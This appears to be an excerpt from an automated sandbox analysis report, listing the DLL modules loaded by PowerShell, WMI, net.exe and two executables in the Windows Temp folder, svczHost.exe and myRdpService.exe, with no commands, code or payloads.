        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp140.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mlang.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mshtml.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: powrprof.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wkscli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msiso.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dll
        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: edgegdi.dll
        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
        Source: C:\Windows\Temp\svczHost.exeSection loaded: apphelp.dll
        Source: C:\Windows\Temp\svczHost.exeSection loaded: iphlpapi.dll
        Source: C:\Windows\Temp\svczHost.exeSection loaded: ncrypt.dll
        Source: C:\Windows\Temp\svczHost.exeSection loaded: ntasn1.dll
        Source: C:\Windows\Temp\svczHost.exeSection loaded: edgegdi.dll
        Source: C:\Windows\Temp\svczHost.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\Temp\svczHost.exeSection loaded: icu.dll
        Source: C:\Windows\Temp\svczHost.exeSection loaded: winhttp.dll
        Source: C:\Windows\Temp\svczHost.exeSection loaded: dhcpcsvc6.dll
        Source: C:\Windows\Temp\svczHost.exeSection loaded: dhcpcsvc.dll
        Source: C:\Windows\Temp\svczHost.exeSection loaded: ondemandconnroutehelper.dll
        Source: C:\Windows\Temp\svczHost.exeSection loaded: mswsock.dll
        Source: C:\Windows\Temp\svczHost.exeSection loaded: wshunix.dll
        Source: C:\Windows\Temp\svczHost.exeSection loaded: dnsapi.dll
        Source: C:\Windows\Temp\svczHost.exeSection loaded: winrnr.dll
        Source: C:\Windows\Temp\svczHost.exeSection loaded: rasadhlp.dll
        Source: C:\Windows\Temp\svczHost.exeSection loaded: nlaapi.dll
        Source: C:\Windows\Temp\svczHost.exeSection loaded: wshbth.dll
        Source: C:\Windows\Temp\svczHost.exeSection loaded: devobj.dll
        Source: C:\Windows\Temp\svczHost.exeSection loaded: pnrpnsp.dll
        Source: C:\Windows\Temp\svczHost.exeSection loaded: fwpuclnt.dll
        Source: C:\Windows\Temp\svczHost.exeSection loaded: napinsp.dll
        Source: C:\Windows\Temp\svczHost.exeSection loaded: cryptsp.dll
        Source: C:\Windows\Temp\svczHost.exeSection loaded: rsaenh.dll
        Source: C:\Windows\Temp\svczHost.exeSection loaded: cryptbase.dll
        Source: C:\Windows\Temp\svczHost.exeSection loaded: ntmarta.dll
        Source: C:\Windows\Temp\svczHost.exeSection loaded: winnsi.dll
        Source: C:\Windows\Temp\svczHost.exeSection loaded: sspicli.dll
        Source: C:\Windows\Temp\svczHost.exeSection loaded: schannel.dll
        Source: C:\Windows\Temp\svczHost.exeSection loaded: mskeyprotect.dll
        Source: C:\Windows\Temp\svczHost.exeSection loaded: ncryptsslp.dll
        Source: C:\Windows\Temp\svczHost.exeSection loaded: msasn1.dll
        Source: C:\Windows\Temp\svczHost.exeSection loaded: gpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: samlib.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dll
        Source: C:\Windows\System32\net.exeSection loaded: mpr.dll
        Source: C:\Windows\System32\net.exeSection loaded: wkscli.dll
        Source: C:\Windows\System32\net.exeSection loaded: netutils.dll
        Source: C:\Windows\System32\net.exeSection loaded: samcli.dll
        Source: C:\Windows\System32\net.exeSection loaded: srvcli.dll
        Source: C:\Windows\System32\net.exeSection loaded: iphlpapi.dll
        Source: C:\Windows\System32\net1.exeSection loaded: samcli.dll
        Source: C:\Windows\System32\net1.exeSection loaded: netutils.dll
        Source: C:\Windows\System32\net1.exeSection loaded: dsrole.dll
        Source: C:\Windows\System32\net1.exeSection loaded: srvcli.dll
        Source: C:\Windows\System32\net1.exeSection loaded: wkscli.dll
        Source: C:\Windows\System32\net1.exeSection loaded: logoncli.dll
        Source: C:\Windows\System32\net1.exeSection loaded: cryptbase.dll
        Source: C:\Windows\Temp\myRdpService.exeSection loaded: apphelp.dll
        Source: C:\Windows\Temp\myRdpService.exeSection loaded: iphlpapi.dll
        Source: C:\Windows\Temp\myRdpService.exeSection loaded: ncrypt.dll
        Source: C:\Windows\Temp\myRdpService.exeSection loaded: version.dll
        Source: C:\Windows\Temp\myRdpService.exeSection loaded: ntasn1.dll
        Source: C:\Windows\Temp\myRdpService.exeSection loaded: edgegdi.dll
        Source: C:\Windows\Temp\myRdpService.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\Temp\myRdpService.exeSection loaded: icu.dll
        Source: C:\Windows\Temp\myRdpService.exeSection loaded: ntmarta.dll
        Source: C:\Windows\Temp\myRdpService.exeSection loaded: cryptsp.dll
        Source: C:\Windows\Temp\myRdpService.exeSection loaded: rsaenh.dll
        Source: C:\Windows\Temp\myRdpService.exeSection loaded: cryptbase.dll
        Source: C:\Windows\Temp\myRdpService.exeSection loaded: winhttp.dll
        Source: C:\Windows\Temp\myRdpService.exeSection loaded: dhcpcsvc6.dll
        Source: C:\Windows\Temp\myRdpService.exeSection loaded: dhcpcsvc.dll
        Source: C:\Windows\Temp\myRdpService.exeSection loaded: ondemandconnroutehelper.dll
        Source: C:\Windows\Temp\myRdpService.exeSection loaded: mswsock.dll
        Source: C:\Windows\Temp\myRdpService.exeSection loaded: wshunix.dll
        Source: C:\Windows\Temp\myRdpService.exeSection loaded: dnsapi.dll
        Source: C:\Windows\Temp\myRdpService.exeSection loaded: winrnr.dll
        Source: C:\Windows\Temp\myRdpService.exeSection loaded: nlaapi.dll
        Source: C:\Windows\Temp\myRdpService.exeSection loaded: wshbth.dll
        Source: C:\Windows\Temp\myRdpService.exeSection loaded: devobj.dll
        Source: C:\Windows\Temp\myRdpService.exeSection loaded: rasadhlp.dll
        Source: C:\Windows\Temp\myRdpService.exeSection loaded: pnrpnsp.dll
        Source: C:\Windows\Temp\myRdpService.exeSection loaded: napinsp.dll
        Source: C:\Windows\Temp\myRdpService.exeSection loaded: fwpuclnt.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
